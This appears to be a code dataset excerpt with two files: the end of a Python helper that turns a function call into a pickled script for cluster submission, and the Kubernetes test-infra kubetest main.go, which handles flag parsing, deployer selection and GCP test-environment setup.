:param hold_filename: filename to use as a hold file.
The containing directory should exist, but the file itself should not.
Defaults to a ./.<random characters>.hold in the current directory.
:return: only returns when all the jobs have finished
"""
if hold_filename is None:
with tempfile.NamedTemporaryFile(prefix='.', suffix='.hold', dir='.') as f:
hold_filename = f.name
if op.exists(hold_filename):
raise IOError(f"Hold file ({hold_filename}) already exists")
elif not op.isdir(op.split(op.abspath(hold_filename))[0]):
raise IOError(f"Hold file ({hold_filename}) can not be created in non-existent directory")
submit(('touch', hold_filename), wait_for=job_ids, minutes=1, job_name='.hold')
while not op.exists(hold_filename):
time.sleep(10)
os.remove(hold_filename)
_external_job = ("""#!{}
# This is a temporary file designed to run the python function {},
# so that it can be submitted to the cluster
import pickle
from io import BytesIO
from importlib import import_module
{}
pickle_bytes = BytesIO({})
name_type, name, func_name, args, kwargs = pickle.load(pickle_bytes)
if name_type == 'module':
# retrieves a function defined in an external module
func = getattr(import_module(name), func_name)
elif name_type == 'script':
# retrieves a function defined in the __main__ script
local_execute = {{'__name__': '__not_main__', '__file__': name}}
exec(open(name, 'r').read(), local_execute)
func = local_execute[func_name]
else:
raise ValueError('Unknown name_type: %r' % name_type)
{}
""")
def func_to_cmd(func, args=None, kwargs=None, tmp_dir=None, clean="never", verbose=False):
"""Defines the command needed to run the function from the command line
WARNING: if submitting a function defined in the __main__ script,
the script will be run again to retrieve this function. Make sure there is a
"if __name__ == '__main__'" guard to prevent the full script from being rerun.
:arg func: function to be run
:arg args: positional arguments
:arg kwargs: keyword arguments
:arg tmp_dir: directory where to store the temporary file
:arg clean: Whether the script should be removed after running. There are three options:
- "never" (default): Script is kept
- "on_success": only remove if script successfully finished (i.e., no error is raised)
- "always": always remove the script, even if it raises an error
:arg verbose: If set to True, the script will print its own filename before running
:return: string which will run the function
"""
if clean not in ('never', 'always', 'on_success'):
raise ValueError(f"Clean should be one of 'never', 'always', or 'on_success', not {clean}")
if args is None:
args = ()
if kwargs is None:
kwargs = {}
pickle_bytes = BytesIO()
if func.__module__ == '__main__':
pickle.dump(('script', importlib.import_module('__main__').__file__, func.__name__,
args, kwargs), pickle_bytes)
else:
pickle.dump(('module', func.__module__, func.__name__,
args, kwargs), pickle_bytes)
handle, filename = tempfile.mkstemp(prefix=func.__name__ + '_',
suffix='.py',
dir=tmp_dir)
os.close(handle)
verbose_script = f'\nprint("running {filename}")\n' if verbose else ''
if clean == 'never':
run_script = "res = func(*args, **kwargs)"
elif clean == 'always':
run_script = f"""try:
res = func(*args, **kwargs)
finally:
import os; os.remove("{filename}")"""
elif clean == 'on_success':
run_script = f"""res = func(*args, **kwargs)
import os; os.remove("{filename}")"""
python_cmd = _external_job.format(sys.executable,
func.__name__,
verbose_script,
pickle_bytes.getvalue(),
run_script)
with open(filename, 'w') as python_file:
python_file.write(python_cmd)
return sys.executable + " " + filename
| [] | [] | [] | [] | [] | python | 0 | 0 | |
kubetest/main.go | /*
Copyright 2017 The Kubernetes Authors.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package main
import (
"context"
"encoding/json"
"errors"
"flag"
"fmt"
"io/ioutil"
"log"
"math/rand"
"os"
"os/exec"
"os/signal"
"path/filepath"
"regexp"
"strconv"
"strings"
"time"
"github.com/spf13/pflag"
"sigs.k8s.io/boskos/client"
"k8s.io/test-infra/kubetest/conformance"
"k8s.io/test-infra/kubetest/kind"
"k8s.io/test-infra/kubetest/process"
"k8s.io/test-infra/kubetest/util"
)
// Hardcoded in ginkgo-e2e.sh
const defaultGinkgoParallel = 25
var (
artifacts = filepath.Join(os.Getenv("WORKSPACE"), "_artifacts")
interrupt = time.NewTimer(time.Duration(0)) // interrupt testing at this time.
terminate = time.NewTimer(time.Duration(0)) // terminate testing at this time.
verbose = false
timeout = time.Duration(0)
boskos, _ = client.NewClient(os.Getenv("JOB_NAME"), "http://boskos.test-pods.svc.cluster.local.", "", "")
control = process.NewControl(timeout, interrupt, terminate, verbose)
)
type options struct {
build buildStrategy
charts bool
checkLeaks bool
checkSkew bool
cluster string
clusterIPRange string
deployment string
down bool
dump string
dumpPreTestLogs string
extract extractStrategies
extractCIBucket string
extractReleaseBucket string
extractSource bool
flushMemAfterBuild bool
focusRegex string
gcpCloudSdk string
gcpMasterImage string
gcpMasterSize string
gcpNetwork string
gcpNodeImage string
gcpImageFamily string
gcpImageProject string
gcpNodes string
gcpNodeSize string
gcpProject string
gcpProjectType string
gcpServiceAccount string
// gcpSSHProxyInstanceName is the name of the vm instance which ip address will be used to set the
// KUBE_SSH_BASTION env. If set, it will result in proxying ssh connections in tests through the
// "bastion". It's useful for clusters with nodes without public ssh access, e.g. nodes without
// public ip addresses. Works only for gcp providers (gce, gke).
gcpSSHProxyInstanceName string
gcpRegion string
gcpZone string
ginkgoParallel ginkgoParallelValue
kubecfg string
kubemark bool
kubemarkMasterSize string
kubemarkNodes string // TODO(fejta): switch to int after migration
logexporterGCSPath string
metadataSources string
noAllowDup bool
nodeArgs string
nodeTestArgs string
nodeTests bool
outputDir string
provider string
publish string
runtimeConfig string
save string
skew bool
skipRegex string
soak bool
soakDuration time.Duration
sshUser string
stage stageStrategy
test bool
testArgs string
testCmd string
testCmdName string
testCmdArgs []string
up bool
upgradeArgs string
boskosWaitDuration time.Duration
}
func defineFlags() *options {
o := options{}
flag.Var(&o.build, "build", "Rebuild k8s binaries, optionally forcing (release|quick|bazel) strategy")
flag.BoolVar(&o.charts, "charts", false, "If true, run charts tests")
flag.BoolVar(&o.checkSkew, "check-version-skew", true, "Verify client and server versions match")
flag.BoolVar(&o.checkLeaks, "check-leaked-resources", false, "Ensure project ends with the same resources")
flag.StringVar(&o.cluster, "cluster", "", "Cluster name. Must be set for --deployment=gke (TODO: other deployments).")
flag.StringVar(&o.clusterIPRange, "cluster-ip-range", "", "Specifies CLUSTER_IP_RANGE value during --up and --test (only relevant for --deployment=bash). Auto-calculated if empty.")
flag.StringVar(&o.deployment, "deployment", "bash", "Choices: none/bash/conformance/gke/kind/kops/node/local")
flag.BoolVar(&o.down, "down", false, "If true, tear down the cluster before exiting.")
flag.StringVar(&o.dump, "dump", "", "If set, dump bring-up and cluster logs to this location on test or cluster-up failure")
flag.StringVar(&o.dumpPreTestLogs, "dump-pre-test-logs", "", "If set, dump cluster logs to this location before running tests")
flag.Var(&o.extract, "extract", "Extract k8s binaries from the specified release location")
flag.StringVar(&o.extractCIBucket, "extract-ci-bucket", "kubernetes-release-dev", "Extract k8s CI binaries from the specified GCS bucket")
flag.StringVar(&o.extractReleaseBucket, "extract-release-bucket", "kubernetes-release", "Extract k8s release binaries from the specified GCS bucket")
flag.BoolVar(&o.extractSource, "extract-source", false, "Extract k8s src together with other tarballs")
flag.BoolVar(&o.flushMemAfterBuild, "flush-mem-after-build", false, "If true, try to flush container memory after building")
flag.Var(&o.ginkgoParallel, "ginkgo-parallel", fmt.Sprintf("Run Ginkgo tests in parallel, default %d runners. Use --ginkgo-parallel=N to specify an exact count.", defaultGinkgoParallel))
flag.StringVar(&o.gcpCloudSdk, "gcp-cloud-sdk", "", "Install/upgrade google-cloud-sdk to the gs:// path if set")
flag.StringVar(&o.gcpProject, "gcp-project", "", "For use with gcloud commands")
flag.StringVar(&o.gcpProjectType, "gcp-project-type", "", "Explicitly indicate which project type to select from boskos")
flag.StringVar(&o.gcpServiceAccount, "gcp-service-account", "", "Service account to activate before using gcloud")
flag.StringVar(&o.gcpZone, "gcp-zone", "", "For use with gcloud commands")
flag.StringVar(&o.gcpRegion, "gcp-region", "", "For use with gcloud commands")
flag.StringVar(&o.gcpNetwork, "gcp-network", "", "Cluster network. Must be set for --deployment=gke (TODO: other deployments).")
flag.StringVar(&o.gcpMasterImage, "gcp-master-image", "", "Master image type (cos|debian on GCE, n/a on GKE)")
flag.StringVar(&o.gcpMasterSize, "gcp-master-size", "", "(--provider=gce only) Size of master to create (e.g n1-standard-1). Auto-calculated if left empty.")
flag.StringVar(&o.gcpNodeImage, "gcp-node-image", "", "Node image type (cos|container_vm on GKE, cos|debian on GCE)")
flag.StringVar(&o.gcpImageFamily, "image-family", "", "Node image family from which to use the latest image, required when --gcp-node-image=CUSTOM")
flag.StringVar(&o.gcpImageProject, "image-project", "", "Project containing node image family, required when --gcp-node-image=CUSTOM")
flag.StringVar(&o.gcpNodes, "gcp-nodes", "", "(--provider=gce only) Number of nodes to create.")
flag.StringVar(&o.gcpNodeSize, "gcp-node-size", "", "(--provider=gce only) Size of nodes to create (e.g n1-standard-1).")
flag.StringVar(&o.gcpSSHProxyInstanceName, "gcp-ssh-proxy-instance-name", "", "(--provider=gce|gke only) If set, will result in proxing the ssh connections via the provided instance name while running tests")
flag.StringVar(&o.kubecfg, "kubeconfig", "", "The location of a kubeconfig file.")
flag.StringVar(&o.focusRegex, "ginkgo-focus", "", "The ginkgo regex to focus. Currently only respected for (dind).")
flag.StringVar(&o.skipRegex, "ginkgo-skip", "", "The ginkgo regex to skip. Currently only respected for (dind).")
flag.BoolVar(&o.kubemark, "kubemark", false, "If true, run kubemark tests.")
flag.StringVar(&o.kubemarkMasterSize, "kubemark-master-size", "", "Kubemark master size (only relevant if --kubemark=true). Auto-calculated based on '--kubemark-nodes' if left empty.")
flag.StringVar(&o.kubemarkNodes, "kubemark-nodes", "5", "Number of kubemark nodes to start (only relevant if --kubemark=true).")
flag.StringVar(&o.logexporterGCSPath, "logexporter-gcs-path", "", "Path to the GCS artifacts directory to dump logs from nodes. Logexporter gets enabled if this is non-empty")
flag.StringVar(&o.metadataSources, "metadata-sources", "images.json", "Comma-separated list of files inside ./artifacts to merge into metadata.json")
flag.StringVar(&o.nodeArgs, "node-args", "", "Args for node e2e tests.")
flag.StringVar(&o.nodeTestArgs, "node-test-args", "", "Test args specifically for node e2e tests.")
flag.BoolVar(&o.noAllowDup, "no-allow-dup", false, "if set --allow-dup will not be passed to push-build and --stage will error if the build already exists on the gcs path")
flag.BoolVar(&o.nodeTests, "node-tests", false, "If true, run node-e2e tests.")
flag.StringVar(&o.provider, "provider", "", "Kubernetes provider such as gce, gke, aws, etc")
flag.StringVar(&o.publish, "publish", "", "Publish version to the specified gs:// path on success")
flag.StringVar(&o.runtimeConfig, "runtime-config", "batch/v2alpha1=true", "If set, API versions can be turned on or off while bringing up the API server.")
flag.StringVar(&o.stage.dockerRegistry, "registry", "", "Push images to the specified docker registry (e.g. gcr.io/a-test-project)")
flag.StringVar(&o.save, "save", "", "Save credentials to gs:// path on --up if set (or load from there if not --up)")
flag.BoolVar(&o.skew, "skew", false, "If true, run tests in another version at ../kubernetes/kubernetes_skew")
flag.BoolVar(&o.soak, "soak", false, "If true, job runs in soak mode")
flag.DurationVar(&o.soakDuration, "soak-duration", 7*24*time.Hour, "Maximum age of a soak cluster before it gets recycled")
flag.Var(&o.stage, "stage", "Upload binaries to gs://bucket/devel/job-suffix if set")
flag.StringVar(&o.stage.versionSuffix, "stage-suffix", "", "Append suffix to staged version when set")
flag.BoolVar(&o.test, "test", false, "Run Ginkgo tests.")
flag.StringVar(&o.testArgs, "test_args", "", "Space-separated list of arguments to pass to Ginkgo test runner.")
flag.StringVar(&o.testCmd, "test-cmd", "", "command to run against the cluster instead of Ginkgo e2e tests")
flag.StringVar(&o.testCmdName, "test-cmd-name", "", "name to log the test command as in xml results")
flag.DurationVar(&timeout, "timeout", time.Duration(0), "Terminate testing after the timeout duration (s/m/h)")
flag.BoolVar(&o.up, "up", false, "If true, start the e2e cluster. If cluster is already up, recreate it.")
flag.StringVar(&o.upgradeArgs, "upgrade_args", "", "If set, run upgrade tests before other tests")
flag.DurationVar(&o.boskosWaitDuration, "boskos-wait-duration", 5*time.Minute, "Defines how long it waits until quit getting Boskos resoure, default 5 minutes")
// The "-v" flag was also used by glog, which is used by k8s.io/client-go. Duplicate flags cause panics.
// 1. Even if we could convince glog to change, they have too many consumers to ever do so.
// 2. The glog lib parses flags during init. It is impossible to dynamically rewrite the args before they're parsed by glog.
// 3. The glog lib takes an int value, so "-v false" is an error.
// 4. It's possible, but unlikely, we could convince k8s.io/client-go to use a logging shim, because a library shouldn't force a logging implementation. This would take a major version release for the lib.
//
// The most reasonable solution is to accept that we shouldn't have made a single-letter global, and rename all references to this variable.
flag.BoolVar(&verbose, "verbose-commands", true, "If true, print all command output.")
// go flag does not support StringArrayVar
pflag.StringArrayVar(&o.testCmdArgs, "test-cmd-args", []string{}, "args for test-cmd")
return &o
}
var suite util.TestSuite = util.TestSuite{Name: "kubetest"}
func validWorkingDirectory() error {
cwd, err := os.Getwd()
if err != nil {
return fmt.Errorf("could not get pwd: %v", err)
}
acwd, err := filepath.Abs(cwd)
if err != nil {
return fmt.Errorf("failed to convert %s to an absolute path: %v", cwd, err)
}
// This also matches "kubernetes_skew" for upgrades.
if !strings.Contains(filepath.Base(acwd), "kubernetes") {
return fmt.Errorf("must run from kubernetes directory root. current: %v", acwd)
}
return nil
}
type deployer interface {
Up() error
IsUp() error
DumpClusterLogs(localPath, gcsPath string) error
TestSetup() error
Down() error
GetClusterCreated(gcpProject string) (time.Time, error)
KubectlCommand() (*exec.Cmd, error)
}
// publisher is implemented by deployers that want to publish status on success
type publisher interface {
// Publish is called when the tests were successful; the deployer should publish a success file
Publish() error
}
func getDeployer(o *options) (deployer, error) {
switch o.deployment {
case "bash":
return newBash(&o.clusterIPRange, o.gcpProject, o.gcpZone, o.gcpSSHProxyInstanceName, o.provider), nil
case "conformance":
return conformance.NewDeployer(o.kubecfg)
case "gke":
return newGKE(o.provider, o.gcpProject, o.gcpZone, o.gcpRegion, o.gcpNetwork, o.gcpNodeImage, o.gcpImageFamily, o.gcpImageProject, o.cluster, o.gcpSSHProxyInstanceName, &o.testArgs, &o.upgradeArgs)
case "kind":
return kind.NewDeployer(control, string(o.build))
case "kops":
return newKops(o.provider, o.gcpProject, o.cluster)
case "node":
return nodeDeploy{provider: o.provider}, nil
case "none":
return noneDeploy{}, nil
case "local":
return newLocalCluster(), nil
case "aksengine":
return newAKSEngine()
case "aks":
return newAksDeployer()
default:
return nil, fmt.Errorf("unknown deployment strategy %q", o.deployment)
}
}
func validateFlags(o *options) error {
if !o.extract.Enabled() && o.extractSource {
return errors.New("--extract-source flag cannot be passed without --extract")
}
return nil
}
func main() {
log.SetFlags(log.LstdFlags | log.Lshortfile)
// Initialize global pseudo random generator. Initializing it to select random AWS Zones.
rand.Seed(time.Now().UnixNano())
pflag.CommandLine = pflag.NewFlagSet(os.Args[0], pflag.ContinueOnError)
o := defineFlags()
pflag.CommandLine.AddGoFlagSet(flag.CommandLine)
if err := pflag.CommandLine.Parse(os.Args[1:]); err != nil {
log.Fatalf("Flag parse failed: %v", err)
}
if err := validateFlags(o); err != nil {
log.Fatalf("Flags validation failed. err: %v", err)
}
control = process.NewControl(timeout, interrupt, terminate, verbose)
// do things when we know we are running in the kubetest image
if os.Getenv("KUBETEST_IN_DOCKER") == "true" {
o.flushMemAfterBuild = true
}
// sanity fix for kind deployer, not set for other deployers to avoid
// breaking changes...
if o.deployment == "kind" {
// always default --dump for kind, in CI use $ARTIFACTS
artifacts := os.Getenv("ARTIFACTS")
if artifacts == "" {
artifacts = "./_artifacts"
}
o.dump = artifacts
}
err := complete(o)
if boskos.HasResource() {
if berr := boskos.ReleaseAll("dirty"); berr != nil {
log.Fatalf("[Boskos] Fail To Release: %v, kubetest err: %v", berr, err)
}
}
if err != nil {
log.Fatalf("Something went wrong: %v", err)
}
}
func complete(o *options) error {
if !terminate.Stop() {
<-terminate.C // Drain the value if necessary.
}
if !interrupt.Stop() {
<-interrupt.C // Drain value
}
if timeout > 0 {
log.Printf("Limiting testing to %s", timeout)
interrupt.Reset(timeout)
}
if o.dump != "" {
defer writeMetadata(o.dump, o.metadataSources)
defer control.WriteXML(&suite, o.dump, time.Now())
}
if o.logexporterGCSPath != "" {
o.testArgs += fmt.Sprintf(" --logexporter-gcs-path=%s", o.logexporterGCSPath)
}
if err := prepare(o); err != nil {
return fmt.Errorf("failed to prepare test environment: %v", err)
}
// Get the deployer before we acquire k8s so any additional flag
// verifications happen early.
deploy, err := getDeployer(o)
if err != nil {
return fmt.Errorf("error creating deployer: %v", err)
}
// Check soaking before run tests
if o.soak {
if created, err := deploy.GetClusterCreated(o.gcpProject); err != nil {
// continue, but log the error
log.Printf("deploy %v, GetClusterCreated failed: %v", o.deployment, err)
} else {
if time.Now().After(created.Add(o.soakDuration)) {
// flip up on - which will tear down previous cluster and start a new one
log.Printf("Previous soak cluster created at %v, will recreate the cluster", created)
o.up = true
}
}
}
if err := acquireKubernetes(o, deploy); err != nil {
return fmt.Errorf("failed to acquire k8s binaries: %v", err)
}
if o.extract.Enabled() {
// If we specified `--extract-source` we will already be in the correct directory
if !o.extractSource {
if err := os.Chdir("kubernetes"); err != nil {
return fmt.Errorf("failed to chdir to kubernetes dir: %v", err)
}
}
}
if err := validWorkingDirectory(); err != nil {
return fmt.Errorf("called from invalid working directory: %v", err)
}
if o.down {
// listen for signals such as ^C and gracefully attempt to clean up
c := make(chan os.Signal, 1)
signal.Notify(c, os.Interrupt)
go func() {
for range c {
log.Print("Captured ^C, gracefully attempting to cleanup resources..")
if err = deploy.Down(); err != nil {
log.Printf("Tearing down deployment failed: %v", err)
}
if err != nil {
os.Exit(1)
}
os.Exit(2)
}
}()
}
if err := run(deploy, *o); err != nil {
return err
}
// Publish the successfully tested version when requested
if o.publish != "" {
if err := publish(o.publish); err != nil {
return err
}
}
return nil
}
func acquireKubernetes(o *options, d deployer) error {
// Potentially build kubernetes
if o.build.Enabled() {
var err error
// kind deployer manages build
if k, ok := d.(*kind.Deployer); ok {
err = control.XMLWrap(&suite, "Build", k.Build)
} else if c, ok := d.(*aksEngineDeployer); ok { // Azure deployer
err = control.XMLWrap(&suite, "Build", func() error {
return c.Build(o.build)
})
} else {
err = control.XMLWrap(&suite, "Build", o.build.Build)
}
if o.flushMemAfterBuild {
util.FlushMem()
}
if err != nil {
return err
}
}
// Potentially stage build binaries somewhere on GCS
if o.stage.Enabled() {
if err := control.XMLWrap(&suite, "Stage", func() error {
return o.stage.Stage(o.noAllowDup)
}); err != nil {
return err
}
}
// Potentially download existing binaries and extract them.
if o.extract.Enabled() {
err := control.XMLWrap(&suite, "Extract", func() error {
// Should we restore a previous state?
// Restore if we are not upping the cluster
if o.save != "" {
if !o.up {
// Restore version and .kube/config from --up
log.Printf("Overwriting extract strategy to load kubeconfig and version from %s", o.save)
o.extract = extractStrategies{
extractStrategy{
mode: load,
option: o.save,
},
}
}
}
// New deployment, extract new version
return o.extract.Extract(o.gcpProject, o.gcpZone, o.gcpRegion, o.extractCIBucket, o.extractReleaseBucket, o.extractSource)
})
if err != nil {
return err
}
}
return nil
}
// Returns the k8s version name
func findVersion() string {
// The version may be in a version file
if _, err := os.Stat("version"); err == nil {
b, err := ioutil.ReadFile("version")
if err == nil {
return strings.TrimSpace(string(b))
}
log.Printf("Failed to read version: %v", err)
}
// We can also get it from the git repo.
if _, err := os.Stat("hack/lib/version.sh"); err == nil {
// TODO(fejta): do this in go. At least we removed the upload-to-gcs.sh dep.
gross := `. hack/lib/version.sh && KUBE_ROOT=. kube::version::get_version_vars && echo "${KUBE_GIT_VERSION-}"`
b, err := control.Output(exec.Command("bash", "-c", gross))
if err == nil {
return strings.TrimSpace(string(b))
}
log.Printf("Failed to get_version_vars: %v", err)
}
return "unknown" // Sad trombone
}
// maybeMergeMetadata will add new keyvals into the map; quietly eats errors.
func maybeMergeJSON(meta map[string]string, path string) {
if data, err := ioutil.ReadFile(path); err == nil {
json.Unmarshal(data, &meta)
}
}
// Write metadata.json, including version and env arg data.
func writeMetadata(path, metadataSources string) error {
m := make(map[string]string)
// Look for any sources of metadata and load 'em
for _, f := range strings.Split(metadataSources, ",") {
maybeMergeJSON(m, filepath.Join(path, f))
}
ver := findVersion()
m["job-version"] = ver // TODO(krzyzacy): retire
m["revision"] = ver
re := regexp.MustCompile(`^BUILD_METADATA_(.+)$`)
for _, e := range os.Environ() {
p := strings.SplitN(e, "=", 2)
r := re.FindStringSubmatch(p[0])
if r == nil {
continue
}
k, v := strings.ToLower(r[1]), p[1]
m[k] = v
}
f, err := os.Create(filepath.Join(path, "metadata.json"))
if err != nil {
return err
}
defer f.Close()
e := json.NewEncoder(f)
return e.Encode(m)
}
// Install cloudsdk tarball to location, updating PATH
func installGcloud(tarball string, location string) error {
if err := os.MkdirAll(location, 0775); err != nil {
return err
}
if err := control.FinishRunning(exec.Command("tar", "xzf", tarball, "-C", location)); err != nil {
return err
}
if err := control.FinishRunning(exec.Command(filepath.Join(location, "google-cloud-sdk", "install.sh"), "--disable-installation-options", "--bash-completion=false", "--path-update=false", "--usage-reporting=false")); err != nil {
return err
}
if err := util.InsertPath(filepath.Join(location, "google-cloud-sdk", "bin")); err != nil {
return err
}
if err := control.FinishRunning(exec.Command("gcloud", "components", "install", "alpha")); err != nil {
return err
}
if err := control.FinishRunning(exec.Command("gcloud", "components", "install", "beta")); err != nil {
return err
}
if err := control.FinishRunning(exec.Command("gcloud", "info")); err != nil {
return err
}
return nil
}
func migrateGcpEnvAndOptions(o *options) error {
var network string
var zone string
switch o.provider {
case "gke":
network = "KUBE_GKE_NETWORK"
zone = "ZONE"
default:
network = "KUBE_GCE_NETWORK"
zone = "KUBE_GCE_ZONE"
}
return util.MigrateOptions([]util.MigratedOption{
{
Env: "PROJECT",
Option: &o.gcpProject,
Name: "--gcp-project",
},
{
Env: zone,
Option: &o.gcpZone,
Name: "--gcp-zone",
},
{
Env: "REGION",
Option: &o.gcpRegion,
Name: "--gcp-region",
},
{
Env: "GOOGLE_APPLICATION_CREDENTIALS",
Option: &o.gcpServiceAccount,
Name: "--gcp-service-account",
},
{
Env: network,
Option: &o.gcpNetwork,
Name: "--gcp-network",
},
{
Env: "KUBE_NODE_OS_DISTRIBUTION",
Option: &o.gcpNodeImage,
Name: "--gcp-node-image",
},
{
Env: "KUBE_MASTER_OS_DISTRIBUTION",
Option: &o.gcpMasterImage,
Name: "--gcp-master-image",
},
{
Env: "NUM_NODES",
Option: &o.gcpNodes,
Name: "--gcp-nodes",
},
{
Env: "NODE_SIZE",
Option: &o.gcpNodeSize,
Name: "--gcp-node-size",
},
{
Env: "MASTER_SIZE",
Option: &o.gcpMasterSize,
Name: "--gcp-master-size",
},
{
Env: "CLOUDSDK_BUCKET",
Option: &o.gcpCloudSdk,
Name: "--gcp-cloud-sdk",
SkipPush: true,
},
})
}
func prepareGcp(o *options) error {
if err := migrateGcpEnvAndOptions(o); err != nil {
return err
}
// Must happen before any gcloud commands
if err := activateServiceAccount(o.gcpServiceAccount); err != nil {
return err
}
if o.provider == "gce" {
if distro := os.Getenv("KUBE_OS_DISTRIBUTION"); distro != "" {
log.Printf("Please use --gcp-master-image=%s --gcp-node-image=%s (instead of deprecated KUBE_OS_DISTRIBUTION)",
distro, distro)
// Note: KUBE_OS_DISTRIBUTION takes precedence over
// KUBE_{MASTER,NODE}_OS_DISTRIBUTION, so override here
// after the migration above.
o.gcpNodeImage = distro
o.gcpMasterImage = distro
if err := os.Setenv("KUBE_NODE_OS_DISTRIBUTION", distro); err != nil {
return fmt.Errorf("could not set KUBE_NODE_OS_DISTRIBUTION=%s: %v", distro, err)
}
if err := os.Setenv("KUBE_MASTER_OS_DISTRIBUTION", distro); err != nil {
return fmt.Errorf("could not set KUBE_MASTER_OS_DISTRIBUTION=%s: %v", distro, err)
}
}
hasGCPImageFamily, hasGCPImageProject := len(o.gcpImageFamily) != 0, len(o.gcpImageProject) != 0
if hasGCPImageFamily != hasGCPImageProject {
return fmt.Errorf("--image-family and --image-project must be both set or unset")
}
if hasGCPImageFamily && hasGCPImageProject {
out, err := control.Output(exec.Command("gcloud", "compute", "images", "describe-from-family", o.gcpImageFamily, "--project", o.gcpImageProject))
if err != nil {
return fmt.Errorf("failed to get latest image from family %q in project %q: %s", o.gcpImageFamily, o.gcpImageProject, err)
}
latestImage := ""
latestImageRegexp := regexp.MustCompile("^name: *(\\S+)")
for _, line := range strings.Split(string(out), "\n") {
matches := latestImageRegexp.FindStringSubmatch(line)
if len(matches) == 2 {
latestImage = matches[1]
break
}
}
if len(latestImage) == 0 {
return fmt.Errorf("failed to get latest image from family %q in project %q", o.gcpImageFamily, o.gcpImageProject)
}
if o.deployment == "node" {
o.nodeArgs += fmt.Sprintf(" --images=%s --image-project=%s", latestImage, o.gcpImageProject)
} else {
os.Setenv("KUBE_GCE_NODE_IMAGE", latestImage)
os.Setenv("KUBE_GCE_NODE_PROJECT", o.gcpImageProject)
}
}
} else if o.provider == "gke" {
if o.deployment == "" {
o.deployment = "gke"
}
if o.deployment != "gke" {
return fmt.Errorf("expected --deployment=gke for --provider=gke, found --deployment=%s", o.deployment)
}
if o.gcpMasterImage != "" {
return fmt.Errorf("expected --gcp-master-image to be empty for --provider=gke, found --gcp-master-image=%s", o.gcpMasterImage)
}
if o.gcpNodes != "" {
return fmt.Errorf("--gcp-nodes cannot be set on GKE, use --gke-shape instead")
}
if o.gcpNodeSize != "" {
return fmt.Errorf("--gcp-node-size cannot be set on GKE, use --gke-shape instead")
}
if o.gcpMasterSize != "" {
return fmt.Errorf("--gcp-master-size cannot be set on GKE, where it's auto-computed")
}
// TODO(kubernetes/test-infra#3536): This is used by the
// ginkgo-e2e.sh wrapper.
nod := o.gcpNodeImage
if nod == "container_vm" {
// gcloud container clusters create understands
// "container_vm", e2es understand "debian".
nod = "debian"
}
if nod == "cos_containerd" {
// gcloud container clusters create understands
// "cos_containerd", e2es only understand
// "gci"/"cos",
nod = "gci"
}
os.Setenv("NODE_OS_DISTRIBUTION", nod)
}
if o.gcpProject == "" {
log.Print("--gcp-project is missing, trying to fetch a project from boskos.\n" +
"(for local runs please set --gcp-project to your dev project)")
var resType string
if o.gcpProjectType != "" {
resType = o.gcpProjectType
} else if o.provider == "gke" {
resType = "gke-project"
} else {
resType = "gce-project"
}
log.Printf("provider %v, will acquire project type %v from boskos", o.provider, resType)
// let's retry 5min to get next available resource
ctx, cancel := context.WithTimeout(context.Background(), o.boskosWaitDuration)
defer cancel()
p, err := boskos.AcquireWait(ctx, resType, "free", "busy")
if err != nil {
return fmt.Errorf("--provider=%s boskos failed to acquire project: %v", o.provider, err)
}
if p == nil {
return fmt.Errorf("boskos does not have a free %s at the moment", resType)
}
go func(c *client.Client, proj string) {
for range time.Tick(time.Minute * 5) {
if err := c.UpdateOne(p.Name, "busy", nil); err != nil {
log.Printf("[Boskos] Update of %s failed with %v", p.Name, err)
}
}
}(boskos, p.Name)
o.gcpProject = p.Name
}
if err := os.Setenv("CLOUDSDK_CORE_PRINT_UNHANDLED_TRACEBACKS", "1"); err != nil {
return fmt.Errorf("could not set CLOUDSDK_CORE_PRINT_UNHANDLED_TRACEBACKS=1: %v", err)
}
if err := control.FinishRunning(exec.Command("gcloud", "config", "set", "project", o.gcpProject)); err != nil {
return fmt.Errorf("fail to set project %s : err %v", o.gcpProject, err)
}
// TODO(krzyzacy):Remove this when we retire migrateGcpEnvAndOptions
// Note that a lot of scripts are still depend on this env in k/k repo.
if err := os.Setenv("PROJECT", o.gcpProject); err != nil {
return fmt.Errorf("fail to set env var PROJECT %s : err %v", o.gcpProject, err)
}
// Ensure ssh keys exist
log.Print("Checking existing of GCP ssh keys...")
k := filepath.Join(util.Home(".ssh"), "google_compute_engine")
if _, err := os.Stat(k); err != nil {
return err
}
pk := k + ".pub"
if _, err := os.Stat(pk); err != nil {
return err
}
log.Printf("Checking presence of public key in %s", o.gcpProject)
if out, err := control.Output(exec.Command("gcloud", "compute", "--project="+o.gcpProject, "project-info", "describe")); err != nil {
return err
} else if b, err := ioutil.ReadFile(pk); err != nil {
return err
} else if !strings.Contains(string(out), string(b)) {
log.Print("Uploading public ssh key to project metadata...")
if err = control.FinishRunning(exec.Command("gcloud", "compute", "--project="+o.gcpProject, "config-ssh")); err != nil {
return err
}
}
// Install custom gcloud version if necessary
if o.gcpCloudSdk != "" {
for i := 0; i < 3; i++ {
if err := control.FinishRunning(exec.Command("gsutil", "-mq", "cp", "-r", o.gcpCloudSdk, util.Home())); err == nil {
break // Success!
}
time.Sleep(1 << uint(i) * time.Second)
}
for _, f := range []string{util.Home(".gsutil"), util.Home("repo"), util.Home("cloudsdk")} {
if _, err := os.Stat(f); err == nil || !os.IsNotExist(err) {
if err = os.RemoveAll(f); err != nil {
return err
}
}
}
install := util.Home("repo", "google-cloud-sdk.tar.gz")
if strings.HasSuffix(o.gcpCloudSdk, ".tar.gz") {
install = util.Home(filepath.Base(o.gcpCloudSdk))
} else {
if err := os.Rename(util.Home(filepath.Base(o.gcpCloudSdk)), util.Home("repo")); err != nil {
return err
}
// Controls which gcloud components to install.
pop, err := util.PushEnv("CLOUDSDK_COMPONENT_MANAGER_SNAPSHOT_URL", "file://"+util.Home("repo", "components-2.json"))
if err != nil {
return err
}
defer pop()
}
if err := installGcloud(install, util.Home("cloudsdk")); err != nil {
return err
}
// gcloud creds may have changed
if err := activateServiceAccount(o.gcpServiceAccount); err != nil {
return err
}
}
if o.kubemark {
if p := os.Getenv("KUBEMARK_BAZEL_BUILD"); strings.ToLower(p) == "y" {
// we need docker-credential-gcr to get authed properly
// https://github.com/bazelbuild/rules_docker#authorization
if err := control.FinishRunning(exec.Command("gcloud", "components", "install", "docker-credential-gcr")); err != nil {
return err
}
if err := control.FinishRunning(exec.Command("docker-credential-gcr", "configure-docker")); err != nil {
return err
}
}
}
return nil
}
